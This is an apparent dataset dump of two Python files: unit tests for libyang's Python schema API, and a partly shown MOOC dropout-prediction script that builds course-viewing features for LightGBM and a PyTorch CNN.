metadata
dict | text
stringlengths 60
3.49M
|
---|---|
{
"source": "jiayinhaoran/libyang",
"score": 2
} |
#### File: python/tests/test_schema.py
```python
import os
import unittest
from libyang import Context
from libyang.schema import Extension
from libyang.schema import IfFeature
from libyang.schema import IfOrFeatures
from libyang.schema import Module
from libyang.schema import Revision
from libyang.schema import SContainer
from libyang.schema import SLeaf
from libyang.schema import SLeafList
from libyang.schema import SList
from libyang.schema import SNode
from libyang.schema import SRpc
from libyang.schema import Type
from libyang.util import LibyangError
YANG_DIR = os.path.join(os.path.dirname(__file__), 'yang')
#------------------------------------------------------------------------------
class ModuleTest(unittest.TestCase):
def setUp(self):
self.ctx = Context(YANG_DIR)
self.module = self.ctx.load_module('yolo-system')
def tearDown(self):
self.module = None
self.ctx.destroy()
self.ctx = None
def test_mod_print_mem(self):
s = self.module.print_mem('tree')
self.assertGreater(len(s), 0)
def test_mod_attrs(self):
self.assertEqual(self.module.name(), 'yolo-system')
self.assertEqual(self.module.description(), 'YOLO.')
self.assertEqual(self.module.prefix(), 'sys')
def test_mod_filepath(self):
self.assertEqual(self.module.filepath(),
os.path.join(YANG_DIR, 'yolo/yolo-system.yang'))
def test_mod_iter(self):
children = list(iter(self.module))
self.assertEqual(len(children), 4)
def test_mod_children_rpcs(self):
rpcs = list(self.module.children(types=(SNode.RPC,)))
self.assertEqual(len(rpcs), 2)
def test_mod_enable_features(self):
self.assertFalse(self.module.feature_state('turbo-boost'))
self.module.feature_enable('turbo-boost')
self.assertTrue(self.module.feature_state('turbo-boost'))
self.module.feature_disable('turbo-boost')
self.assertFalse(self.module.feature_state('turbo-boost'))
self.module.feature_enable_all()
self.assertTrue(self.module.feature_state('turbo-boost'))
self.module.feature_disable_all()
def test_mod_features(self):
features = list(self.module.features())
self.assertEqual(len(features), 2)
def test_mod_get_feature(self):
self.module.feature_enable('turbo-boost')
feature = self.module.get_feature('turbo-boost')
self.assertEqual(feature.name(), 'turbo-boost')
self.assertEqual(feature.description(), 'Goes faster.')
self.assertIsNone(feature.reference())
self.assertTrue(feature.state())
self.assertFalse(feature.deprecated())
self.assertFalse(feature.obsolete())
def test_mod_get_feature_not_found(self):
with self.assertRaises(LibyangError):
self.module.get_feature('does-not-exist')
def test_mod_revisions(self):
revisions = list(self.module.revisions())
self.assertEqual(len(revisions), 2)
self.assertIsInstance(revisions[0], Revision)
self.assertEqual(revisions[0].date(), '1999-04-01')
self.assertEqual(revisions[1].date(), '1990-04-01')
#------------------------------------------------------------------------------
class RevisionTest(unittest.TestCase):
def setUp(self):
self.ctx = Context(YANG_DIR)
mod = self.ctx.load_module('yolo-system')
revisions = list(mod.revisions())
self.revision = revisions[0]
def tearDown(self):
self.revision = None
self.ctx.destroy()
self.ctx = None
def test_rev_date(self):
self.assertEqual(self.revision.date(), '1999-04-01')
def test_rev_reference(self):
self.assertEqual(self.revision.reference(),
'RFC 2549 - IP over Avian Carriers with Quality of Service.')
def test_rev_description(self):
self.assertEqual(self.revision.description(), 'Version update.')
def test_rev_extensions(self):
exts = list(self.revision.extensions())
self.assertEqual(len(exts), 1)
ext = self.revision.get_extension('human-name', prefix='omg-extensions')
self.assertIsInstance(ext, Extension)
#------------------------------------------------------------------------------
class IfFeatureTest(unittest.TestCase):
def setUp(self):
self.ctx = Context(YANG_DIR)
mod = self.ctx.load_module('yolo-system')
mod.feature_enable_all()
self.leaf = next(self.ctx.find_path(
'/yolo-system:conf/yolo-system:isolation-level'))
def tearDown(self):
self.container = None
self.ctx.destroy()
self.ctx = None
def test_iffeatures(self):
iffeatures = list(self.leaf.if_features())
self.assertEqual(len(iffeatures), 1)
def test_iffeature_tree(self):
iff = next(self.leaf.if_features())
tree = iff.tree()
self.assertIsInstance(tree, IfOrFeatures)
self.assertIsInstance(tree.a, IfFeature)
self.assertIsInstance(tree.b, IfFeature)
self.assertEqual(tree.a.feature().name(), 'turbo-boost')
self.assertEqual(tree.b.feature().name(), 'networking')
def test_iffeature_str(self):
iff = next(self.leaf.if_features())
self.assertEqual(str(iff), 'turbo-boost OR networking')
def test_iffeature_dump(self):
iff = next(self.leaf.if_features())
self.assertEqual(iff.dump(), '''OR
turbo-boost [Goes faster.]
networking [Supports networking.]
''')
#------------------------------------------------------------------------------
class ContainerTest(unittest.TestCase):
def setUp(self):
self.ctx = Context(YANG_DIR)
mod = self.ctx.load_module('yolo-system')
mod.feature_enable_all()
self.container = next(self.ctx.find_path('/yolo-system:conf'))
def tearDown(self):
self.container = None
self.ctx.destroy()
self.ctx = None
def test_cont_attrs(self):
self.assertIsInstance(self.container, SContainer)
self.assertEqual(self.container.nodetype(), SNode.CONTAINER)
self.assertEqual(self.container.keyword(), 'container')
self.assertEqual(self.container.name(), 'conf')
self.assertEqual(self.container.fullname(), 'yolo-system:conf')
self.assertEqual(self.container.description(), 'Configuration.')
self.assertEqual(self.container.config_set(), False)
self.assertEqual(self.container.config_false(), False)
self.assertEqual(self.container.mandatory(), False)
self.assertIsInstance(self.container.module(), Module)
self.assertEqual(self.container.schema_path(), '/yolo-system:conf')
self.assertEqual(self.container.data_path(), '/yolo-system:conf')
self.assertIs(self.container.presence(), None)
def test_cont_iter(self):
children = list(iter(self.container))
self.assertEqual(len(children), 7)
def test_cont_children_leafs(self):
leafs = list(self.container.children(types=(SNode.LEAF,)))
self.assertEqual(len(leafs), 5)
def test_cont_parent(self):
self.assertIsNone(self.container.parent())
#------------------------------------------------------------------------------
class ListTest(unittest.TestCase):
SCHEMA_PATH = '/yolo-system:conf/yolo-system:url'
DATA_PATH = "/yolo-system:conf/url[proto='%s'][host='%s']"
def setUp(self):
self.ctx = Context(YANG_DIR)
self.ctx.load_module('yolo-system')
self.list = next(self.ctx.find_path(self.SCHEMA_PATH))
def tearDown(self):
self.list = None
self.ctx.destroy()
self.ctx = None
def test_list_attrs(self):
self.assertIsInstance(self.list, SList)
self.assertEqual(self.list.nodetype(), SNode.LIST)
self.assertEqual(self.list.keyword(), 'list')
self.assertEqual(self.list.schema_path(), self.SCHEMA_PATH)
self.assertEqual(self.list.data_path(), self.DATA_PATH)
self.assertFalse(self.list.ordered())
def test_list_keys(self):
keys = list(self.list.keys())
self.assertEqual(len(keys), 2)
def test_list_iter(self):
children = list(iter(self.list))
self.assertEqual(len(children), 5)
def test_list_children_skip_keys(self):
children = list(self.list.children(skip_keys=True))
self.assertEqual(len(children), 3)
def test_list_parent(self):
parent = self.list.parent()
self.assertIsNotNone(parent)
self.assertIsInstance(parent, SContainer)
self.assertEqual(parent.name(), 'conf')
#------------------------------------------------------------------------------
class RpcTest(unittest.TestCase):
def setUp(self):
self.ctx = Context(YANG_DIR)
self.ctx.load_module('yolo-system')
self.rpc = next(self.ctx.find_path('/yolo-system:format-disk'))
def tearDown(self):
self.rpc = None
self.ctx.destroy()
self.ctx = None
def test_rpc_attrs(self):
self.assertIsInstance(self.rpc, SRpc)
self.assertEqual(self.rpc.nodetype(), SNode.RPC)
self.assertEqual(self.rpc.keyword(), 'rpc')
self.assertEqual(self.rpc.schema_path(), '/yolo-system:format-disk')
def test_rpc_extensions(self):
ext = list(self.rpc.extensions())
self.assertEqual(len(ext), 1)
ext = self.rpc.get_extension('require-admin', prefix='omg-extensions')
self.assertIsInstance(ext, Extension)
def test_rpc_params(self):
leaf = next(self.rpc.children())
self.assertIsInstance(leaf, SLeaf)
self.assertEqual(leaf.data_path(), '/yolo-system:format-disk/disk')
leaf = next(self.rpc.input().children())
self.assertIsInstance(leaf, SLeaf)
def test_rpc_no_parent(self):
self.assertIsNone(self.rpc.parent())
#------------------------------------------------------------------------------
class LeafTypeTest(unittest.TestCase):
def setUp(self):
self.ctx = Context(YANG_DIR)
self.ctx.load_module('yolo-system')
def tearDown(self):
self.ctx.destroy()
self.ctx = None
def test_leaf_type_derived(self):
leaf = next(self.ctx.find_path('/yolo-system:conf/yolo-system:hostname'))
self.assertIsInstance(leaf, SLeaf)
t = leaf.type()
self.assertIsInstance(t, Type)
self.assertEqual(t.name(), 'host')
self.assertEqual(t.base(), Type.STRING)
d = t.derived_type()
self.assertEqual(d.name(), 'str')
dd = d.derived_type()
self.assertEqual(dd.name(), 'string')
def test_leaf_type_status(self):
leaf = next(self.ctx.find_path('/yolo-system:conf/yolo-system:hostname'))
self.assertIsInstance(leaf, SLeaf)
self.assertEqual(leaf.deprecated(), False)
self.assertEqual(leaf.obsolete(), False)
leaf = next(self.ctx.find_path('/yolo-system:conf/yolo-system:deprecated-leaf'))
self.assertIsInstance(leaf, SLeaf)
self.assertEqual(leaf.deprecated(), True)
self.assertEqual(leaf.obsolete(), False)
leaf = next(self.ctx.find_path('/yolo-system:conf/yolo-system:obsolete-leaf'))
self.assertIsInstance(leaf, SLeaf)
self.assertEqual(leaf.deprecated(), False)
self.assertEqual(leaf.obsolete(), True)
def test_leaf_type_union(self):
leaf = next(self.ctx.find_path('/yolo-system:conf/yolo-system:number'))
self.assertIsInstance(leaf, SLeafList)
t = leaf.type()
self.assertIsInstance(t, Type)
self.assertEqual(t.name(), 'number')
self.assertEqual(t.base(), Type.UNION)
types = set(u.name() for u in t.union_types())
self.assertEqual(types, set(['signed', 'unsigned']))
bases = set(t.basenames())
self.assertEqual(bases, set(['int16', 'int32', 'uint16', 'uint32']))
def test_leaf_type_enum(self):
leaf = next(self.ctx.find_path(
'/yolo-system:conf/yolo-system:url/yolo-system:proto'))
self.assertIsInstance(leaf, SLeaf)
t = leaf.type()
self.assertIsInstance(t, Type)
self.assertEqual(t.name(), 'protocol')
self.assertEqual(t.base(), Type.ENUM)
enums = [e for e, _ in t.enums()]
self.assertEqual(enums, ['http', 'https', 'ftp', 'sftp', 'tftp'])
def test_leaf_type_bits(self):
leaf = next(self.ctx.find_path(
'/yolo-system:chmod/yolo-system:input/yolo-system:perms'))
self.assertIsInstance(leaf, SLeaf)
t = leaf.type()
self.assertIsInstance(t, Type)
self.assertEqual(t.name(), 'permissions')
self.assertEqual(t.base(), Type.BITS)
bits = [b for b, _ in t.bits()]
self.assertEqual(bits, ['read', 'write', 'execute'])
def test_leaf_parent(self):
leaf = next(self.ctx.find_path(
'/yolo-system:conf/yolo-system:url/yolo-system:proto'))
parent = leaf.parent()
self.assertIsNotNone(parent)
self.assertIsInstance(parent, SList)
self.assertEqual(parent.name(), 'url')
``` |
{
"source": "JiayinL/Dropout-Prediction",
"score": 2
} |
#### File: JiayinL/Dropout-Prediction/gdbt_cnn.py
```python
from lightgbm import LGBMClassifier
import pandas as pd
import pandas_profiling
from sklearn.preprocessing import LabelEncoder
from tqdm import tqdm
from joblib import Parallel,delayed
import numpy as np
import re
import pandas_profiling
import time
import json
import torch
import torch.nn as nn
import torch.nn.parallel
import torch.optim as optim
import torch.utils.data
from torch.autograd import Variable
import torch.nn.utils.rnn as rnn_utils
from sklearn.utils import shuffle
import catboost
from catboost import CatBoostClassifier, Pool, cv
from sklearn.utils import shuffle
from sklearn.metrics import f1_score
from sklearn.metrics import roc_auc_score
def time_transform(t):
# 先转换为时间数组
timeArray = time.strptime(t, "%Y-%m-%d %H:%M:%S")
# 转换为时间戳
timeStamp = int(time.mktime(timeArray))
return timeStamp
def Z_score(mean_, std_,x):
return (x-mean_)/std_
def max_mean_std(data):
return np.max(data), np.mean(data), np.std(data)
def calculate_acc(predictions, truth):
hit = 0
for i in range(len(predictions)):
if predictions[i] == truth[i]:
hit = hit +1
return hit/len(predictions)
train_set = pd.read_csv('train_set.csv',converters={'label_list': eval})
test_set = pd.read_csv('test_set_course_vec.csv',converters={'label_list': eval, 'course_vecs_CNN':eval, 'course_vecs_LR':eval})
course_info = pd.read_json('course_info.json',lines=True) #706 courses
video_info = pd.read_json('video_info.json',lines=True) #38181 videos
videoID = video_info['id'].values.tolist()
courseID = course_info['course_id'].values.tolist()
videoID_encoder = LabelEncoder()
courseID_encoder = LabelEncoder()
videoID_encoder.fit(videoID)
courseID_encoder.fit(courseID)
course_info['courseID'] = course_info['course_id'].progress_apply(lambda x : courseID_encoder.transform([x]))
course_info['videoIDs'] = course_info['item'].progress_apply(lambda x : videoID_encoder.transform(x))
course_video_num = {}
def count_videos(courseId, videoIds):
number_of_video = len(videoIds)
course_video_num[courseId[0]] = number_of_video
course_info.progress_apply(lambda row: count_videos(row['courseID'],row['videoIDs']), axis=1)
course_frequence= {}
frequence_list = []
course_ids = course_info['courseID'].values.tolist()
course_ids =[ item for elem in course_ids for item in elem] #706 courses
for i in range(len(course_ids)):
course_frequence[course_ids[i]]=0
# course_frequence[470]
def course_frequence_calculate(courseListIDs):
courseListIDs=re.sub('\s+', ' ',courseListIDs[1:-1].strip(' '))
courses_ = [int(i) for i in courseListIDs.split(' ')]
for i in range(len(courses_)):
num = course_frequence[courses_[i]] +1
course_frequence[courses_[i]] = num
train_set['courseListIDs'].progress_apply(lambda x : course_frequence_calculate(x))
for k,v in course_frequence.items():
frequence_list.append(v)
mean_course_frequence, max_course_frequence, std_course_frequence = max_mean_std(frequence_list)
video_start_times_info = []
video_end_times_info = []
local_start_times_info = []
local_end_times_info = []
video_durations_info = []
local_watching_times_info = []
video_progress_times_info = []
watching_counts_info = []
local_interval_info = []
video_duration ={}
def collect_info(course_ids,video_ids,watching_counts,video_durations,local_watching_times,video_progress_times,
video_start_times, video_end_times, local_start_times,local_end_times,courseListIDs):
course_ids = eval(course_ids)
video_ids = eval(video_ids)
watching_counts = eval(watching_counts)
video_durations = eval(video_durations)
local_watching_times = eval(local_watching_times)
video_progress_times = eval(video_progress_times)
video_start_times = eval(video_start_times)
video_end_times = eval(video_end_times)
local_start_times = eval(local_start_times)
local_end_times = eval(local_end_times)
courseListIDs=re.sub('\s+', ' ',courseListIDs[1:-1].strip(' '))
courses_ = [int(i) for i in courseListIDs.split(' ')]
courses = {}
courses_textual_content = {}
courses_textual_name = {}
for i in range(len(courses_)):
courses[courses_[i]] = []
for i in range(len(course_ids)):
course = course_ids[i]
local_start_times_ = time_transform(local_start_times[i])
local_end_times_ = time_transform(local_end_times[i])
interval = local_end_times_ - local_start_times_
video_start_times_info.append(video_start_times[i])
video_end_times_info.append(video_end_times[i])
local_start_times_info.append(local_start_times_)
local_end_times_info.append(local_end_times_)
video_durations_info.append(video_durations[i])
video_duration[video_ids[i]] = video_durations[i]
local_watching_times_info.append(local_watching_times[i])
video_progress_times_info.append(video_progress_times[i])
watching_counts_info.append(watching_counts[i])
local_interval_info.append(interval)
train_set.progress_apply(lambda row: collect_info(row['course_ids'],row['video_ids'],row['watching_counts'],row['video_durations'],row['local_watching_times'],row['video_progress_times'],
row['video_start_times'], row['video_end_times'], row['local_start_times'],row['local_end_times'],row['courseListIDs']), axis=1)
#global stastic info
std_local_start_times_info = np.std(local_start_times_info, ddof=1)
mean_local_start_times_info = np.mean(local_start_times_info)
std_video_start_times_info = np.std(video_start_times_info, ddof=1)
mean_video_start_times_info = np.mean(video_start_times_info)
std_video_end_times_info = np.std(video_end_times_info, ddof=1)
mean_video_end_times_info = np.mean(video_end_times_info)
std_local_end_times_info = np.std(local_end_times_info, ddof=1)
mean_local_end_times_info = np.mean(local_end_times_info)
std_video_durations_info = np.std(video_durations_info, ddof=1)
mean_video_durations_info = np.mean(video_durations_info)
std_local_watching_times_info = np.std(local_watching_times_info, ddof=1)
mean_local_watching_times_info = np.mean(local_watching_times_info)
std_video_progress_times_info = np.std(video_progress_times_info, ddof=1)
mean_video_progress_times_info = np.mean(video_progress_times_info)
std_watching_counts_info = np.std(watching_counts_info, ddof=1)
mean_watching_counts_info = np.mean(watching_counts_info)
std_local_interval_info = np.std(local_interval_info, ddof=1)
mean_local_interval_info = np.mean(local_interval_info)
def feature_genration(course_ids,video_ids,watching_counts,video_durations,local_watching_times,video_progress_times,
video_start_times, video_end_times, local_start_times,local_end_times,courseListIDs):
course_ids = eval(course_ids)
video_ids = eval(video_ids)
watching_counts = eval(watching_counts)
video_durations = eval(video_durations)
local_watching_times = eval(local_watching_times)
video_progress_times = eval(video_progress_times)
video_start_times = eval(video_start_times)
video_end_times = eval(video_end_times)
local_start_times = eval(local_start_times)
local_end_times = eval(local_end_times)
unix_start_time = [time_transform(i) for i in local_start_times]
unix_end_time = [time_transform(i) for i in local_end_times]
unix_interval = [unix_end_time[i] - unix_start_time[i] for i in range(len(unix_start_time))]
z_score_local_start_time = [Z_score(mean_local_start_times_info,std_local_start_times_info,i) for i in unix_start_time]
z_score_local_end_time = [Z_score(mean_local_end_times_info,std_local_end_times_info,i) for i in unix_end_time]
z_score_interval = [Z_score(mean_local_interval_info,std_local_interval_info,i) for i in unix_interval]
courseListIDs=re.sub('\s+', ' ',courseListIDs[1:-1].strip(' '))
courses_ = [int(i) for i in courseListIDs.split(' ')]
courses = {}
for i in range(len(courses_)):
courses[courses_[i]] = []
# courses_textual_name[courses_[i]] = []
# courses_textual_content[courses_[i]] = []
for i in range(len(course_ids)):
course = course_ids[i]
info_vec = [course_ids[i],watching_counts[i],video_durations[i],local_watching_times[i],video_progress_times[i],
video_start_times[i], video_end_times[i],z_score_interval[i],z_score_local_start_time[i],z_score_local_end_time[i]]
courses[course].append(info_vec)
course_vec = []
for i in range(len(courses_)):
info_vecs = courses[courses_[i]]
total_video_num = course_video_num[courses_[i]]
num_of_vdo = len(info_vecs)
percentage_viewed = num_of_vdo/total_video_num
num_of_cos = len(courses_)
course_watching_counts = [info_vecs[j][1] for j in range(len(info_vecs))]
course_time_per_watching = [info_vecs[j][3]/info_vecs[j][1] for j in range(len(info_vecs))]
course_video_durations = [info_vecs[j][2] for j in range(len(info_vecs))]
course_local_watching_times = [info_vecs[j][3] for j in range(len(info_vecs))]
course_video_progress_times = [info_vecs[j][4] for j in range(len(info_vecs))]
course_video_watching_speed = [info_vecs[j][3]/info_vecs[j][4] for j in range(len(info_vecs))]
course_video_start_times = [info_vecs[j][5] for j in range(len(info_vecs))]
course_video_end_times = [info_vecs[j][6] for j in range(len(info_vecs))]
course_z_score_interval = [info_vecs[j][7] for j in range(len(info_vecs))]
course_z_score_local_start_time =[info_vecs[j][8] for j in range(len(info_vecs))]
course_z_score_local_end_time =[info_vecs[j][9] for j in range(len(info_vecs))]
max_watching_counts, mean_watching_counts, std_watching_counts = max_mean_std(course_watching_counts)
max_video_durations, mean_video_durations, std_video_durations = max_mean_std(course_video_durations)
max_local_watching_times, mean_local_watching_times, std_local_watching_times = max_mean_std(course_local_watching_times)
max_video_progress_times, mean_video_progress_times, std_video_progress_times = max_mean_std(course_video_progress_times)
max_video_watching_speed, mean_video_watching_speed, std_video_watching_speed = max_mean_std(course_video_watching_speed)
max_video_start_times, mean_video_start_times, std_video_start_times = max_mean_std(course_video_start_times)
max_video_end_times, mean_video_end_times, std_video_end_times = max_mean_std(course_video_end_times)
max_z_score_interval, mean_z_score_interval, std_z_score_interval = max_mean_std(course_z_score_interval)
max_z_score_local_start_time, mean_z_score_local_start_time, std_z_score_local_start_time = max_mean_std(course_z_score_local_start_time)
max_z_score_local_end_time, mean_z_score_local_end_time, std_z_score_local_end_time = max_mean_std(course_z_score_local_end_time)
max_time_per_watching, mean_time_per_watching, std_time_per_watching = max_mean_std(course_time_per_watching)
#compared to global stastic
# mean_watching_counts_ratio = mean_watching_counts/mean_watching_counts_info
# mean_video_durations_ratio = mean_video_durations/mean_video_durations_info
# mean_local_watching_times_ratio = mean_local_watching_times/mean_local_watching_times_info
# mean_watching_speed_ratio = mean_video_watching_speed/(mean_local_watching_times_info/mean_video_progress_times_info)
# std_watching_counts_ratio = std_watching_counts/std_watching_counts_info
# std_video_durations_ratio = std_video_durations/std_video_durations_info
# std_local_watching_times_ratio = std_local_watching_times/std_local_watching_times_info
# std_watching_speed_ratio = std_video_watching_speed/(std_local_watching_times_info/std_video_progress_times_info)
course_frequence_z_score = Z_score(mean_course_frequence,std_course_frequence,course_frequence[courses_[i]])
total_watching_counts = np.sum(course_watching_counts)
total_video_durations = np.sum(course_video_durations)
total_local_watching_times = np.sum(course_local_watching_times)
total_video_progress_times = np.sum(course_video_progress_times)
vec = [courses_[i],num_of_cos,num_of_vdo,max_watching_counts, mean_watching_counts, std_watching_counts,
max_video_durations, mean_video_durations, std_video_durations,
max_local_watching_times, mean_local_watching_times, std_local_watching_times,
max_video_progress_times, mean_video_progress_times, std_video_progress_times,
max_video_watching_speed, mean_video_watching_speed, std_video_watching_speed,
max_video_start_times, mean_video_start_times, std_video_start_times,
max_video_end_times, mean_video_end_times, std_video_end_times,
max_z_score_interval, mean_z_score_interval, std_z_score_interval,
total_video_num, percentage_viewed,
max_z_score_local_start_time, mean_z_score_local_start_time, std_z_score_local_start_time,
max_z_score_local_end_time, mean_z_score_local_end_time, std_z_score_local_end_time,
# mean_watching_counts_ratio,mean_video_durations_ratio,mean_local_watching_times_ratio,mean_watching_speed_ratio,
# std_watching_counts_ratio,std_video_durations_ratio,std_local_watching_times_ratio,std_watching_speed_ratio
course_frequence_z_score,max_time_per_watching, mean_time_per_watching, std_time_per_watching,
total_watching_counts,total_video_durations,total_local_watching_times,total_video_progress_times
]
course_vec.append(vec)
return course_vec
def gbdt_prediction(course_ids,video_ids,watching_counts,video_durations,local_watching_times,video_progress_times,
video_start_times, video_end_times, local_start_times,local_end_times,courseListIDs):
course_ids = eval(course_ids)
video_ids = eval(video_ids)
watching_counts = eval(watching_counts)
video_durations = eval(video_durations)
local_watching_times = eval(local_watching_times)
video_progress_times = eval(video_progress_times)
video_start_times = eval(video_start_times)
video_end_times = eval(video_end_times)
local_start_times = eval(local_start_times)
local_end_times = eval(local_end_times)
unix_start_time = [time_transform(i) for i in local_start_times]
unix_end_time = [time_transform(i) for i in local_end_times]
unix_interval = [unix_end_time[i] - unix_start_time[i] for i in range(len(unix_start_time))]
z_score_local_start_time = [Z_score(mean_local_start_times_info,std_local_start_times_info,i) for i in unix_start_time]
z_score_local_end_time = [Z_score(mean_local_end_times_info,std_local_end_times_info,i) for i in unix_end_time]
z_score_interval = [Z_score(mean_local_interval_info,std_local_interval_info,i) for i in unix_interval]
courseListIDs=re.sub('\s+', ' ',courseListIDs[1:-1].strip(' '))
courses_ = [int(i) for i in courseListIDs.split(' ')]
courses = {}
for i in range(len(courses_)):
courses[courses_[i]] = []
# courses_textual_name[courses_[i]] = []
# courses_textual_content[courses_[i]] = []
for i in range(len(course_ids)):
course = course_ids[i]
info_vec = [course_ids[i],watching_counts[i],video_durations[i],local_watching_times[i],video_progress_times[i],
video_start_times[i], video_end_times[i],z_score_interval[i],z_score_local_start_time[i],z_score_local_end_time[i]]
courses[course].append(info_vec)
course_vec = []
for i in range(len(courses_)):
info_vecs = courses[courses_[i]]
total_video_num = course_video_num[courses_[i]]
num_of_vdo = len(info_vecs)
percentage_viewed = num_of_vdo/total_video_num
num_of_cos = len(courses_)
course_watching_counts = [info_vecs[j][1] for j in range(len(info_vecs))]
course_time_per_watching = [info_vecs[j][3]/info_vecs[j][1] for j in range(len(info_vecs))]
course_video_durations = [info_vecs[j][2] for j in range(len(info_vecs))]
course_local_watching_times = [info_vecs[j][3] for j in range(len(info_vecs))]
course_video_progress_times = [info_vecs[j][4] for j in range(len(info_vecs))]
course_video_watching_speed = [info_vecs[j][3]/info_vecs[j][4] for j in range(len(info_vecs))]
course_video_start_times = [info_vecs[j][5] for j in range(len(info_vecs))]
course_video_end_times = [info_vecs[j][6] for j in range(len(info_vecs))]
course_z_score_interval = [info_vecs[j][7] for j in range(len(info_vecs))]
course_z_score_local_start_time =[info_vecs[j][8] for j in range(len(info_vecs))]
course_z_score_local_end_time =[info_vecs[j][9] for j in range(len(info_vecs))]
max_watching_counts, mean_watching_counts, std_watching_counts = max_mean_std(course_watching_counts)
max_video_durations, mean_video_durations, std_video_durations = max_mean_std(course_video_durations)
max_local_watching_times, mean_local_watching_times, std_local_watching_times = max_mean_std(course_local_watching_times)
max_video_progress_times, mean_video_progress_times, std_video_progress_times = max_mean_std(course_video_progress_times)
max_video_watching_speed, mean_video_watching_speed, std_video_watching_speed = max_mean_std(course_video_watching_speed)
max_video_start_times, mean_video_start_times, std_video_start_times = max_mean_std(course_video_start_times)
max_video_end_times, mean_video_end_times, std_video_end_times = max_mean_std(course_video_end_times)
max_z_score_interval, mean_z_score_interval, std_z_score_interval = max_mean_std(course_z_score_interval)
max_z_score_local_start_time, mean_z_score_local_start_time, std_z_score_local_start_time = max_mean_std(course_z_score_local_start_time)
max_z_score_local_end_time, mean_z_score_local_end_time, std_z_score_local_end_time = max_mean_std(course_z_score_local_end_time)
max_time_per_watching, mean_time_per_watching, std_time_per_watching = max_mean_std(course_time_per_watching)
#compared to global stastic
course_frequence_z_score = Z_score(mean_course_frequence,std_course_frequence,course_frequence[courses_[i]])
total_watching_counts = np.sum(course_watching_counts)
total_video_durations = np.sum(course_video_durations)
total_local_watching_times = np.sum(course_local_watching_times)
total_video_progress_times = np.sum(course_video_progress_times)
vec = [courses_[i],num_of_cos,num_of_vdo,max_watching_counts, mean_watching_counts, std_watching_counts,
max_video_durations, mean_video_durations, std_video_durations,
max_local_watching_times, mean_local_watching_times, std_local_watching_times,
max_video_progress_times, mean_video_progress_times, std_video_progress_times,
max_video_watching_speed, mean_video_watching_speed, std_video_watching_speed,
max_video_start_times, mean_video_start_times, std_video_start_times,
max_video_end_times, mean_video_end_times, std_video_end_times,
max_z_score_interval, mean_z_score_interval, std_z_score_interval,
total_video_num, percentage_viewed,
max_z_score_local_start_time, mean_z_score_local_start_time, std_z_score_local_start_time,
max_z_score_local_end_time, mean_z_score_local_end_time, std_z_score_local_end_time,
# mean_watching_counts_ratio,mean_video_durations_ratio,mean_local_watching_times_ratio,mean_watching_speed_ratio,
# std_watching_counts_ratio,std_video_durations_ratio,std_local_watching_times_ratio,std_watching_speed_ratio
course_frequence_z_score,max_time_per_watching, mean_time_per_watching, std_time_per_watching,
total_watching_counts,total_video_durations,total_local_watching_times,total_video_progress_times
]
course_vec.append(vec)
r_lightGBM = model_lgb.predict_proba(course_vec).tolist()
r1 = []
for i in range(len(r_lightGBM)):
r1.append(r_lightGBM[i][1])
# r = model_lgb.predict(course_vec).tolist()
# r = catboost_model.predict(course_vec).tolist()
return r1
train_set['course_vecs2'] = train_set.progress_apply(lambda row: feature_genration(row['course_ids'],row['video_ids'],row['watching_counts'],row['video_durations'],row['local_watching_times'],row['video_progress_times'],
row['video_start_times'], row['video_end_times'], row['local_start_times'],row['local_end_times'],row['courseListIDs']), axis=1)
data = train_set[['label_list','course_vecs2']]
labels = data['label_list'].values.tolist()
y = [ item for elem in labels for item in elem]
course_info = data['course_vecs2'].values.tolist()
course_list = [ item for elem in course_info for item in elem]
model_lgb = LGBMClassifier(boosting_type='gbdt', num_leaves=64, learning_rate=0.01, n_estimators=2000,
max_bin=425, subsample_for_bin=50000, objective='binary', min_split_gain=0,
min_child_weight=5, min_child_samples=10, subsample=0.8, subsample_freq=1,
colsample_bytree=1, reg_alpha=3, reg_lambda=5, seed=1000, n_jobs=-1, silent=True)
model_lgb.fit(course_list, y,
eval_names=['train'],
eval_metric=['logloss','auc'],
eval_set=[(course_list, y)],
early_stopping_rounds=10)
#test data prep
test_set['course_vecs2'] = test_set.progress_apply(lambda row: feature_genration(row['course_ids'],row['video_ids'],row['watching_counts'],row['video_durations'],row['local_watching_times'],row['video_progress_times'],
row['video_start_times'], row['video_end_times'], row['local_start_times'],row['local_end_times'],row['courseListIDs']), axis=1)
test_data = train_set[['label_list','course_vecs2']]
test_labels = test_data['label_list'].values.tolist()
ground_truth = [ item for elem in test_labels for item in elem]
course_info_test = test_data['course_vecs2'].values.tolist()
course_list_test = [ item for elem in course_info_test for item in elem]
result2 = model_lgb.predict(course_list_test)
result2 =result2.tolist()
acc = calculate_acc(result2,ground_truth)
nb_courses = 706+1
course_emb_size = 5
nb_videos = 38181+1
video_emb_size = 15
feature_size1 = course_emb_size + 42
sequence_len = 70
feature_size2 = course_emb_size + video_emb_size + 13
num_out_channel = 32
kernel_size = [3,4,5]
output_size = 32
hidden_dim = 64
num_of_lstm_layer = 1
class CNN(nn.Module):
def __init__(self):
super(CNN, self).__init__()
self.course_embedding = torch.nn.Embedding(nb_courses, course_emb_size)
self.video_embedding = torch.nn.Embedding(nb_videos, video_emb_size)
self.ReLU_activation = nn.ReLU()
self.tanh_activation = nn.Tanh()
self.conv1 = nn.Conv1d(in_channels=feature_size2,out_channels=num_out_channel,kernel_size=kernel_size[0])
self.maxpool1 = nn.MaxPool1d(sequence_len - kernel_size[0] + 1)
self.conv2 = nn.Conv1d(in_channels=feature_size2,out_channels=num_out_channel,kernel_size=kernel_size[1])
self.maxpool2 = nn.MaxPool1d(sequence_len - kernel_size[1] + 1)
self.conv3 = nn.Conv1d(in_channels=feature_size2,out_channels=num_out_channel,kernel_size=kernel_size[2])
self.maxpool3 = nn.MaxPool1d(sequence_len - kernel_size[2] + 1)
self.fc1 = nn.Linear(num_out_channel*len(kernel_size), 64)
self.fc2 = nn.Linear(64, 16)
self.fc3 = nn.Linear(16, 1)
# self.softmax = nn.Softmax()
self.sigmoid = nn.Sigmoid()
def forward(self, course_id, video_id, continues):
#course_id (batch_size, max_sen_len)
#continues (batch_size, max_sen_len, feature_size)
emb1 = self.course_embedding(course_id) # (batch_size,max_sen_len, embed_size)
emb2 = self.video_embedding(video_id)
x = torch.cat([emb1,emb2,continues], 2)
x = x.permute(0, 2, 1) # Batch_size * (feature_dim) * max_sen_len
x1 = self.conv1(x)#.squeeze(2) # shape = (64, num_channels, 1)(squeeze 2)
x1 = self.ReLU_activation(x1)
x1 = self.maxpool1(x1)
x1 = x1.squeeze(2)
x2 = self.conv2(x)#.squeeze(2) # shape = (64, num_channels, 1)(squeeze 2)
x2 = self.ReLU_activation(x2)
x2 = self.maxpool2(x2)
x2 = x2.squeeze(2)
